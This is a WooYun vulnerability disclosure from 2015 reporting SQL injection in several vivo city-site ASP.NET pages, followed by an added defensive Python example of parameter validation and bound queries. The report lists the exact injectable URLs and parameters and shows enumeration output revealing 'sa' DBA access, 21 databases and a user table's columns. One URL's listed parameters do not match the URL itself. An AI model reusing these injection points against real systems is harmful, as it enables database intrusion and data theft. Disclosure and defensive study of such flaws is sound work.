WooYun (WooYun.org) historical vulnerability lookup --- http://wy.zone.ci/
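2015-07-29: Details reported to the vendor; awaiting vendor handling
2015-08-03: The vendor actively ignored the vulnerability; details disclosed to the public
As per the title.
Multiple SQL injection points, with multiple injectable parameters.
First location, multiple parameters: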
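http://city.vivo.com.cn/mb/CheckAll.aspx?actiontype=1&pageindex=2&t=0.7262028979603201&typeid=468
Parameter actiontype is injectable
Parameter pageindex is injectable
Parameter t is injectable
Parameter typeid is injectable
Second location, multiple parameters:
http://city.vivo.com.cn/pc/CheckAll.aspx?actiontype=1&pageindex=2&t=0.4454611742403358
Parameter actiontype is injectable
Parameter pageindex is injectable
Parameter t is injectable
Parameter typeid is injectable
Third location, POST injection:
http://city.vivo.com.cn/mb/CheckAll.aspx?actiontype=MoreUpload&t=0.7064304086379707
POST parameters: PowerHidden1=*&PowerHidden2=1
The PowerHidden parameter is injectable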
web server operating system: Windows 2008 R2 or 7
web application technology: ASP.NET, ASP.NET 4.0.30319, Microsoft IIS 7.5
back-end DBMS: Microsoft SQL Server 2008
current user: 'sa'
current database: 'vivoPhone'
current user is DBA: True
available databases [21]:
[*] BobbiBrown
[*] BobbiBrown_WX
[*] CKWJ
[*] CKWJ_2
[*] DeBON_WX
[*] EHLL
[*] Godiva
[*] Inoherb
[*] master
[*] Melvita
[*] model
[*] msdb
[*] NetShow_App_SM_WX
[*] SephoraHR
[*] SteveMadden
[*] Stokke
[*] Stokke_WX
[*] Swarovski
[*] tempdb
[*] vivoPhone
[*] WOW

web server operating system: Windows 2008 R2 or 7
web application technology: ASP.NET, ASP.NET 4.0.30319, Microsoft IIS 7.5
back-end DBMS: Microsoft SQL Server 2008
Database: vivoPhone
[4 tables]
+-----------------+
| CityScanFace    |
| CityUpload      |
| Logs            |
| UserInformation |
+-----------------+

web server operating system: Windows 2008 R2 or 7
web application technology: ASP.NET, ASP.NET 4.0.30319, Microsoft IIS 7.5
back-end DBMS: Microsoft SQL Server 2008
Database: vivoPhone
Table: UserInformation
[7 columns]
+------------+----------+
| Column     | Type     |
+------------+----------+
| Contact    | nvarchar |
| GameTime   | decimal  |
| HeadImgUrl | nvarchar |
| NickName   | nvarchar |
| OpenId     | nvarchar |
| UniqueId   | int      |
| UserName   | nvarchar |
+------------+----------+
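
A defensive counterpart to the findings above, as an added example that is not part of the original report or the vendor's code: strict validation of the query parameters named in the first reported URL, followed by a bound-parameter query. The allowed values and ranges, the `items` table, the treatment of `t` as a cache-buster, and the use of Python's sqlite3 in place of SQL Server are assumptions made so that it runs offline.

```python
import sqlite3
from urllib.parse import parse_qs, urlsplit

ALLOWED_ACTIONS = {"1", "MoreUpload"}  # only the values visible in the reported URLs
PAGE_SIZE = 10                         # assumed page size


class BadRequest(ValueError):
    """A parameter failed validation; a handler would map this to HTTP 400."""


def bounded_int(name, raw, lo, hi):
    # ASCII digits only: no sign, whitespace, operators or Unicode digits.
    if not (raw.isascii() and raw.isdigit() and len(raw) <= 9):
        raise BadRequest(f"{name}: not an integer")
    value = int(raw)
    if not lo <= value <= hi:
        raise BadRequest(f"{name}: out of range")
    return value


def parse_request(url):
    qs = parse_qs(urlsplit(url).query, keep_blank_values=True)

    def one(name):
        values = qs.get(name, [])
        if len(values) != 1:           # missing or duplicated parameter
            raise BadRequest(f"{name}: expected exactly one value")
        return values[0]

    action = one("actiontype")
    if action not in ALLOWED_ACTIONS:
        raise BadRequest("actiontype: not allowed")
    # "t" is never read: assumed to be a cache-buster with no business in SQL.
    return {"actiontype": action,
            "pageindex": bounded_int("pageindex", one("pageindex"), 1, 10_000),
            "typeid": bounded_int("typeid", one("typeid"), 1, 2**31 - 1)}


def list_items(conn, params):
    # Values travel as bound parameters, never as part of the SQL text.
    offset = (params["pageindex"] - 1) * PAGE_SIZE
    return conn.execute(
        "SELECT id, title FROM items WHERE typeid = ? ORDER BY id LIMIT ? OFFSET ?",
        (params["typeid"], PAGE_SIZE, offset)).fetchall()


def demo_db():  # constructed sample data
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE items (id INTEGER PRIMARY KEY, typeid INTEGER, title TEXT)")
    conn.executemany("INSERT INTO items (typeid, title) VALUES (?, ?)",
                     [(468, "a"), (468, "b"), (7, "c")])
    return conn
```

In ASP.NET the same pattern is a `SqlCommand` with `SqlParameter` values. Since the output above shows the application connecting as 'sa', the application login should also be replaced with a least-privileged account.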
Severity: no impact; ignored by vendor
Ignored at: 2015-08-03 09:24
Vulnerability Rank: 4 (WooYun rating)
None yet